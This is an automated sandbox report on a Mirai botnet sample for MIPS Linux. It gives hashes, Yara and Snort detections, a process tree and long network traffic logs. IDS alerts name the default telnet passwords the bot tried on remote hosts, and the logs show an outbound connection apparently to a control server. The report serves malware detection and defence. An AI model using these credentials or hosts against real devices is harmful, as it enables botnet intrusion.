Play interactive tour

Edit tour

Linux Analysis Report HCyigyiCAH

Overview

General Information

Sample Name:	HCyigyiCAH
Analysis ID:	509945
MD5:	37d47c84691e35296d2eee47a3bb19c3
SHA1:	afe47428ba503e1d48d58ca9e63dec079676af01
SHA256:	be3c2bbc9ccb07afdb7d40068a1d4ab3911ba6e81eddc72d3e7251fbc09d5aff
Tags:	32elfmipsmirai
Infos:
Most interesting Screenshot:

Detection

Mirai

Score:	72
Range:	0 - 100
Whitelisted:	false

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Mirai

Multi AV Scanner detection for submitted file

Sample is packed with UPX

Uses known network protocols on non-standard ports

Sample contains only a LOAD segment without any section mappings

Yara signature match

Uses the "uname" system call to query kernel version information (possible evasion)

Detected TCP or UDP traffic on non-standard ports

Sample listens on a socket

Classification

Analysis Advice

Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures

Static ELF header machine description suggests that the sample might not execute correctly on this machine

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	509945
Start date:	27.10.2021
Start time:	07:51:17
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 15s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	HCyigyiCAH
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Detection:	MAL
Classification:	mal72.troj.evad.lin@0/0@0/0
Warnings:	Show All Report size exceeded maximum capacity and may have missing network information. TCP Packets have been reduced to 100

Process Tree

system is lnxubuntu20

HCyigyiCAH (PID: 5287, Parent: 5119, MD5: 0083f1f0e77be34ad27f849842bbb00c) Arguments: /tmp/HCyigyiCAH

HCyigyiCAH New Fork (PID: 5292, Parent: 5287)

HCyigyiCAH New Fork (PID: 5293, Parent: 5287)

HCyigyiCAH New Fork (PID: 5296, Parent: 5287)

HCyigyiCAH New Fork (PID: 5297, Parent: 5287)

HCyigyiCAH New Fork (PID: 5299, Parent: 5287)

cleanup

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
HCyigyiCAH	SUSP_ELF_LNX_UPX_Compressed_File	Detects a suspicious ELF binary with UPX compression	Florian Roth	0x7988:$s1: PROT_EXEC\|PROT_WRITE failed. 0x79f7:$s2: $Id: UPX 0x79a8:$s3: $Info: This file is packed with the UPX executable packer

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Mirai_12	Yara detected Mirai	Joe Security

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: HCyigyiCAH	Virustotal: Detection: 20%			Perma Link
Source: HCyigyiCAH	ReversingLabs: Detection: 25%

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 404 ICMP Destination Unreachable Protocol Unreachable 213.100.207.63: -> 192.168.2.23:
Source: Traffic	Snort IDS: 716 INFO TELNET access 63.145.93.66:23 -> 192.168.2.23:60982
Source: Traffic	Snort IDS: 404 ICMP Destination Unreachable Protocol Unreachable 213.113.96.66: -> 192.168.2.23:
Source: Traffic	Snort IDS: 716 INFO TELNET access 63.145.93.66:23 -> 192.168.2.23:33016
Source: Traffic	Snort IDS: 2023433 ET TROJAN Possible Linux.Mirai Login Attempt (7ujMko0admin) 192.168.2.23:35248 -> 69.173.197.206:23
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 69.173.197.206:23 -> 192.168.2.23:35248
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 69.173.197.206:23 -> 192.168.2.23:35248
Source: Traffic	Snort IDS: 716 INFO TELNET access 63.145.93.66:23 -> 192.168.2.23:33232
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:49020 -> 203.209.76.162:23
Source: Traffic	Snort IDS: 404 ICMP Destination Unreachable Protocol Unreachable 109.189.163.2: -> 192.168.2.23:
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 58.211.32.180:23 -> 192.168.2.23:47466
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 69.173.197.206:23 -> 192.168.2.23:35410
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 69.173.197.206:23 -> 192.168.2.23:35410
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 93.222.111.77:23 -> 192.168.2.23:49538
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 93.222.111.77:23 -> 192.168.2.23:49538
Source: Traffic	Snort IDS: 716 INFO TELNET access 63.145.93.66:23 -> 192.168.2.23:33390
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 58.211.32.180:23 -> 192.168.2.23:47524
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 58.211.32.180:23 -> 192.168.2.23:47568
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 58.211.32.180:23 -> 192.168.2.23:47646
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 58.211.32.180:23 -> 192.168.2.23:47742
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 69.173.197.206:23 -> 192.168.2.23:35700
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 69.173.197.206:23 -> 192.168.2.23:35700
Source: Traffic	Snort IDS: 716 INFO TELNET access 63.145.93.66:23 -> 192.168.2.23:33654
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 58.211.32.180:23 -> 192.168.2.23:47786
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 93.222.111.77:23 -> 192.168.2.23:49862
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 93.222.111.77:23 -> 192.168.2.23:49862
Source: Traffic	Snort IDS: 716 INFO TELNET access 177.135.122.105:23 -> 192.168.2.23:37510
Source: Traffic	Snort IDS: 404 ICMP Destination Unreachable Protocol Unreachable 37.44.205.214: -> 192.168.2.23:
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 58.211.32.180:23 -> 192.168.2.23:47874
Source: Traffic	Snort IDS: 2023333 ET TROJAN Linux.Mirai Login Attempt (xc3511) 192.168.2.23:42466 -> 77.60.19.209:23
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:42466 -> 77.60.19.209:23
Source: Traffic	Snort IDS: 2023450 ET TROJAN Possible Linux.Mirai Login Attempt (xmhdipc) 192.168.2.23:42494 -> 77.60.19.209:23
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 58.211.32.180:23 -> 192.168.2.23:47944
Source: Traffic	Snort IDS: 716 INFO TELNET access 218.4.210.150:23 -> 192.168.2.23:35130
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 69.173.197.206:23 -> 192.168.2.23:35922
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 69.173.197.206:23 -> 192.168.2.23:35922
Source: Traffic	Snort IDS: 716 INFO TELNET access 63.145.93.66:23 -> 192.168.2.23:33854
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 58.211.32.180:23 -> 192.168.2.23:47990
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 58.211.32.180:23 -> 192.168.2.23:48036
Source: Traffic	Snort IDS: 716 INFO TELNET access 177.135.122.105:23 -> 192.168.2.23:37700
Source: Traffic	Snort IDS: 716 INFO TELNET access 183.203.162.27:23 -> 192.168.2.23:53080
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 93.222.111.77:23 -> 192.168.2.23:50164
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 93.222.111.77:23 -> 192.168.2.23:50164
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 183.203.162.27:23 -> 192.168.2.23:53080
Source: Traffic	Snort IDS: 716 INFO TELNET access 125.125.24.0:23 -> 192.168.2.23:47460
Source: Traffic	Snort IDS: 716 INFO TELNET access 183.203.162.27:23 -> 192.168.2.23:53120
Source: Traffic	Snort IDS: 404 ICMP Destination Unreachable Protocol Unreachable 62.97.186.102: -> 192.168.2.23:
Source: Traffic	Snort IDS: 716 INFO TELNET access 125.125.24.0:23 -> 192.168.2.23:47486
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 183.203.162.27:23 -> 192.168.2.23:53120
Source: Traffic	Snort IDS: 716 INFO TELNET access 218.4.210.150:23 -> 192.168.2.23:35382
Source: Traffic	Snort IDS: 716 INFO TELNET access 125.125.24.0:23 -> 192.168.2.23:47510
Source: Traffic	Snort IDS: 716 INFO TELNET access 183.203.162.27:23 -> 192.168.2.23:53168
Source: Traffic	Snort IDS: 716 INFO TELNET access 125.125.24.0:23 -> 192.168.2.23:47530
Source: Traffic	Snort IDS: 716 INFO TELNET access 61.127.32.65:23 -> 192.168.2.23:53832
Source: Traffic	Snort IDS: 716 INFO TELNET access 63.145.93.66:23 -> 192.168.2.23:34084
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 183.203.162.27:23 -> 192.168.2.23:53168
Source: Traffic	Snort IDS: 716 INFO TELNET access 125.125.24.0:23 -> 192.168.2.23:47544
Source: Traffic	Snort IDS: 716 INFO TELNET access 61.127.32.65:23 -> 192.168.2.23:53858
Source: Traffic	Snort IDS: 716 INFO TELNET access 183.203.162.27:23 -> 192.168.2.23:53206
Source: Traffic	Snort IDS: 716 INFO TELNET access 125.125.24.0:23 -> 192.168.2.23:47578
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 183.203.162.27:23 -> 192.168.2.23:53206
Source: Traffic	Snort IDS: 716 INFO TELNET access 61.127.32.65:23 -> 192.168.2.23:53888
Source: Traffic	Snort IDS: 716 INFO TELNET access 125.125.24.0:23 -> 192.168.2.23:47596
Source: Traffic	Snort IDS: 716 INFO TELNET access 177.135.122.105:23 -> 192.168.2.23:37922
Source: Traffic	Snort IDS: 716 INFO TELNET access 183.203.162.27:23 -> 192.168.2.23:53252
Source: Traffic	Snort IDS: 716 INFO TELNET access 61.127.32.65:23 -> 192.168.2.23:53916
Source: Traffic	Snort IDS: 716 INFO TELNET access 125.125.24.0:23 -> 192.168.2.23:47622
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 183.203.162.27:23 -> 192.168.2.23:53252
Source: Traffic	Snort IDS: 716 INFO TELNET access 125.125.24.0:23 -> 192.168.2.23:47638
Source: Traffic	Snort IDS: 716 INFO TELNET access 61.127.32.65:23 -> 192.168.2.23:53944
Source: Traffic	Snort IDS: 716 INFO TELNET access 183.203.162.27:23 -> 192.168.2.23:53292
Source: Traffic	Snort IDS: 716 INFO TELNET access 125.125.24.0:23 -> 192.168.2.23:47652
Source: Traffic	Snort IDS: 716 INFO TELNET access 61.127.32.65:23 -> 192.168.2.23:53956
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:47652 -> 125.125.24.0:23
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 183.203.162.27:23 -> 192.168.2.23:53292
Source: Traffic	Snort IDS: 716 INFO TELNET access 61.127.32.65:23 -> 192.168.2.23:53972
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 93.222.111.77:23 -> 192.168.2.23:50420
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 93.222.111.77:23 -> 192.168.2.23:50420
Source: Traffic	Snort IDS: 716 INFO TELNET access 218.4.210.150:23 -> 192.168.2.23:35556
Source: Traffic	Snort IDS: 716 INFO TELNET access 183.203.162.27:23 -> 192.168.2.23:53320

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 48002
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 48030
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 48034
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 47980
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 48066
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 48068
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 48070
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 48046
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 48074
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 48078
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 48082
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 48080
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 48090
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 48092
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 48098
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 48100
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 48088
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 48120
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 48152
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45110
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45112
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45132
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45132
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45140
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45160
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45168
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45170
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45174
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45194
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45210

Source: global traffic

TCP traffic: 192.168.2.23:45976 -> 104.244.72.185:9902

Source: /tmp/HCyigyiCAH (PID: 5287)

Socket: 127.0.0.1::22292

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 48654
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 48652
Source: unknown	Network traffic detected: HTTP traffic on port 41494 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60690 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 37760
Source: unknown	Network traffic detected: HTTP traffic on port 58810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 39374 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38610
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56038
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58464
Source: unknown	Network traffic detected: HTTP traffic on port 52232 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59314
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57378
Source: unknown	Network traffic detected: HTTP traffic on port 35974 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 38712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 46228
Source: unknown	Network traffic detected: HTTP traffic on port 46460 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 45138
Source: unknown	Network traffic detected: HTTP traffic on port 36772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 48642
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 44042
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 46460
Source: unknown	Network traffic detected: HTTP traffic on port 54206 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 35328
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58468
Source: unknown	Network traffic detected: HTTP traffic on port 45226 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 36664
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 35324
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 35566
Source: unknown	Network traffic detected: HTTP traffic on port 33472 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51616 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60306
Source: unknown	Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59620 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50996
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 44032
Source: unknown	Network traffic detected: HTTP traffic on port 54104 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 38610 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 37686 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 35316
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38830
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51600
Source: unknown	Network traffic detected: HTTP traffic on port 36324 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 43388 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 33142
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 34474
Source: unknown	Network traffic detected: HTTP traffic on port 56376 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 47534
Source: unknown	Network traffic detected: HTTP traffic on port 41848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 44266
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 47770
Source: unknown	Network traffic detected: HTTP traffic on port 44266 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 43080 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51616
Source: unknown	Network traffic detected: HTTP traffic on port 47534 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 36640
Source: unknown	Network traffic detected: HTTP traffic on port 41678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 34456
Source: unknown	Network traffic detected: HTTP traffic on port 42808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 34460
Source: unknown	Network traffic detected: HTTP traffic on port 35984 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58250
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 48858
Source: unknown	Network traffic detected: HTTP traffic on port 44198 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 46656 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38654
Source: unknown	Network traffic detected: HTTP traffic on port 37216 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59470 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57570
Source: unknown	Network traffic detected: HTTP traffic on port 39512 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58580 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 45318 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50946
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55454 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 36084 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 37554
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 34038
Source: unknown	Network traffic detected: HTTP traffic on port 42600 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56248
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59522
Source: unknown	Network traffic detected: HTTP traffic on port 54572 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 46622 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57074 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58430
Source: unknown	Network traffic detected: HTTP traffic on port 56444 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50952
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 47588
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 47586
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50954
Source: unknown	Network traffic detected: HTTP traffic on port 47714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 40040 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 44074
Source: unknown	Network traffic detected: HTTP traffic on port 40200 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53054 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60510
Source: unknown	Network traffic detected: HTTP traffic on port 56972 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 41778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 41046 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 33180
Source: unknown	Network traffic detected: HTTP traffic on port 58156 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54136 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 46004
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 48422
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50968
Source: unknown	Network traffic detected: HTTP traffic on port 46380 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 48422 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 35346
Source: unknown	Network traffic detected: HTTP traffic on port 57884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 33746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59300
Source: unknown	Network traffic detected: HTTP traffic on port 48940 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 34262
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59782
Source: unknown	Network traffic detected: HTTP traffic on port 36096 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51818
Source: unknown	Network traffic detected: HTTP traffic on port 45214 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 48996 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 47326
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49348
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52756
Source: unknown	Network traffic detected: HTTP traffic on port 37934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38450
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38452
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 36274
Source: unknown	Network traffic detected: HTTP traffic on port 37212 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38458
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38448
Source: unknown	Network traffic detected: HTTP traffic on port 43850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 46778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 34096
Source: unknown	Network traffic detected: HTTP traffic on port 52406 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52092 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 38464 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54044 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53618
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38686
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51674
Source: unknown	Network traffic detected: HTTP traffic on port 46044 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58034 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38204
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38438
Source: unknown	Network traffic detected: HTTP traffic on port 43386 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 34086
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59160
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 34364 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57378 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 34456 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 48236
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38430
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 36010
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38432
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 47380
Source: unknown	Network traffic detected: HTTP traffic on port 52234 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 45572 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60154
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 42922
Source: unknown	Network traffic detected: HTTP traffic on port 52276 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 46044
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 46042
Source: unknown	Network traffic detected: HTTP traffic on port 44184 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52540
Source: unknown	Network traffic detected: HTTP traffic on port 35970 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 36486
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39512
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 36238
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 35396
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 35154
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 48218
Source: unknown	Network traffic detected: HTTP traffic on port 50478 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 38488 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50776
Source: unknown	Network traffic detected: HTTP traffic on port 43780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 40854 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 38654 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38490
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38492
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39584
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 36078
Source: unknown	Network traffic detected: HTTP traffic on port 52978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 1872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57254 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 34386 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 42742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40320
Source: unknown	Network traffic detected: HTTP traffic on port 58846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40564
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51636
Source: unknown	Network traffic detected: HTTP traffic on port 39818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49266 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53816
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38482
Source: unknown	Network traffic detected: HTTP traffic on port 38686 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42434 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38488
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 43828
Source: unknown	Network traffic detected: HTTP traffic on port 53278 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60342
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60582
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58034
Source: unknown	Network traffic detected: HTTP traffic on port 43092 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59364
Source: unknown	Network traffic detected: HTTP traffic on port 35852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 32898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60588
Source: unknown	Network traffic detected: HTTP traffic on port 46828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52978
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54914
Source: unknown	Network traffic detected: HTTP traffic on port 35396 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50310
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59378
Source: unknown	Network traffic detected: HTTP traffic on port 56160 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 47700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 35270 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59088 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49348 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 38466 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 38384 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 36280
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39550
Source: unknown	Network traffic detected: HTTP traffic on port 57870 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49594
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38460
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52982
Source: unknown	Network traffic detected: HTTP traffic on port 55370 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 48260
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38464
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38466
